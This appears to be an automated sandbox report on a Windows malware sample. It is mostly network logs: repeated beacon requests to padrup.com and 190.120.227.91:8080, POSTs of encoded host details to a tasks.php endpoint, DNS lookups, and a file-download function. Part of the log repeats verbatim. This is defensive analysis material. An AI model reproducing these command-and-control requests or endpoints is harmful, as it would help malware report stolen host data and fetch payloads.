        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?29d43e7c=701775484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?29f3e9f8=-1479563296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2a6f2852=688527934 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2a895223=713642531 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2b0ab4f0=-684357456 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /n/tasks.php HTTP/1.0Host: n.ddnsgratis.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: 192Data Raw: 5f 77 76 3d 59 32 31 6b 4a 6a 6c 6c 4d 54 51 32 59 6d 55 35 4c 57 4d 33 4e 6d 45 74 4e 44 63 79 4d 43 31 69 59 32 52 69 4c 54 55 7a 4d 44 45 78 59 6a 67 33 59 6d 51 77 4e 69 5a 6b 52 32 78 31 57 56 4e 42 4e 6b 6c 47 55 6b 70 55 61 30 56 30 56 55 56 4e 5a 30 39 70 51 54 52 4f 65 6d 63 77 54 56 52 46 4a 54 4e 45 4a 6c 64 70 62 6d 52 76 64 33 4d 6c 4d 6a 41 78 4d 43 55 79 4d 43 67 32 4e 43 31 69 61 58 51 70 4a 6a 45 6d 56 32 6c 75 5a 47 39 33 63 79 55 79 4d 45 52 6c 5a 6d 56 75 5a 47 56 79 4a 6a 55 75 4d 53 59 78 4f 43 34 78 4d 43 34 79 4d 44 49 30 4a 6b 35 50 54 6b 55 3d 0a Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2b436842=725837890 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2bc60f28=-2091766408 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2be56550=-1225394912 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2e00e35c=-1979536876 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2e54b34b=777302859 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2ff37fd5=-1349550467 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?308e5400=-443594752 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?311dbd80=1473261184 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?31430591=-1815539533 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?31c7acfb=1551219421 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?31e7f67c=-1054365092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3269d32c=845796140 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?328f1419=848237593 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?331ed01f=-1728675592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?3337cce9=1720097375 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /n/tasks.php HTTP/1.0Host: n.ddnsgratis.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: 192Data Raw: 5f 77 76 3d 59 32 31 6b 4a 6a 6c 6c 4d 54 51 32 59 6d 55 35 4c 57 4d 33 4e 6d 45 74 4e 44 63 79 4d 43 31 69 59 32 52 69 4c 54 55 7a 4d 44 45 78 59 6a 67 33 59 6d 51 77 4e 69 5a 6b 52 32 78 31 57 56 4e 42 4e 6b 6c 47 55 6b 70 55 61 30 56 30 56 55 56 4e 5a 30 39 70 51 54 52 4f 65 6d 63 77 54 56 52 46 4a 54 4e 45 4a 6c 64 70 62 6d 52 76 64 33 4d 6c 4d 6a 41 78 4d 43 55 79 4d 43 67 32 4e 43 31 69 61 58 51 70 4a 6a 45 6d 56 32 6c 75 5a 47 39 33 63 79 55 79 4d 45 52 6c 5a 6d 56 75 5a 47 56 79 4a 6a 55 75 4d 53 59 78 4f 43 34 78 4d 43 34 79 4d 44 49 30 4a 6b 35 50 54 6b 55 3d 0a Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?33c00681=914368262 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: unknownTCP traffic detected without corresponding DNS query: 190.120.227.91
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01440945 lstrcpy,InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_01440945
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?72f523=7533859 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?74d2bd=76561250 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?df9780=58613248 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?7caa7d=57190763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?7d519a=82128900 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?cb36a4=13317796 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?eaa8c1=153786250 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?165b05c=164090500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?18a856f=77566029 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?20c2a09=309164625 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?22aca7d=145435124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2a61d79=222204765 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2c5425f=92964030 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?333df63=53731171 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?352e846=390355434 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3d3b9b1=192621843 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?3ff2df5=201165279 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?47aa66b=526028013 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4991659=617132744 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?50e8edc=169680312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?542972c=882501560 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?5b7e0de=767493872 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?10d62ae4=564942280 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?115dbf54=-1381402296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1176f212=293007890 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?11fef99e=-1275740116 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?121e2607=-1559275969 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?12ba214d=-2095650533 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?12d42dc2=947685702 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?13de3bbe=-1294984786 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?140deb53=-1939771579 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1495f698=690744624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?14b59e3b=1737234215 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1543ef95=713547562 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?15aba7b5=-659256046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?16b31880=-867443584 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?16d8692d=1149844359 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1781559f=-1928855110 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?17a69eba=-1120602672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?18285ae2=405297890 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1847fe9d=-1443367349 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?18b777d9=-977551672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?18d65779=-1378065329 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?195904b8=425264312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?19856214=856343592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1a078ca7=-1238050671 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?253429ca=1872526686 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?25bc9cf1=633117937 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?25d5c2b0=-486371296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?269bb762=239207342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?270a0145=-2040263502 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?27c85804=-957761516 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?27fe3552=-1611082424 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?28892810=465574000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?28a2e80b=-204378046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2924596e=690248046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2945db31=1244584328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?29d43e7c=701775484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?29f3e9f8=-1479563296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2a6f2852=688527934 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2a895223=713642531 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2b0ab4f0=-684357456 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2b436842=725837890 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2bc60f28=-2091766408 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2be56550=-1225394912 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2e00e35c=-1979536876 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2e54b34b=777302859 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2ff37fd5=-1349550467 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?308e5400=-443594752 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?311dbd80=1473261184 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?31430591=-1815539533 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?31c7acfb=1551219421 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?31e7f67c=-1054365092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3269d32c=845796140 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?328f1419=848237593 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?331ed01f=-1728675592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?3337cce9=1720097375 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?33c00681=914368262 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: padrup.com
        Source: global trafficDNS traffic detected: DNS query: ns.dotbit.me
        Source: global trafficDNS traffic detected: DNS query: alors.deepdns.cryptostorm.net
        Source: global trafficDNS traffic detected: DNS query: onyx.deepdns.cryptostorm.net
        Source: global trafficDNS traffic detected: DNS query: ns1.any.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: ns1.random.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: n.ddnsgratis.com.br
        Source: global trafficDNS traffic detected: DNS query: ns2.random.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: anyone.dnsrec.meo.ws
        Source: global trafficDNS traffic detected: DNS query: ist.fellig.org
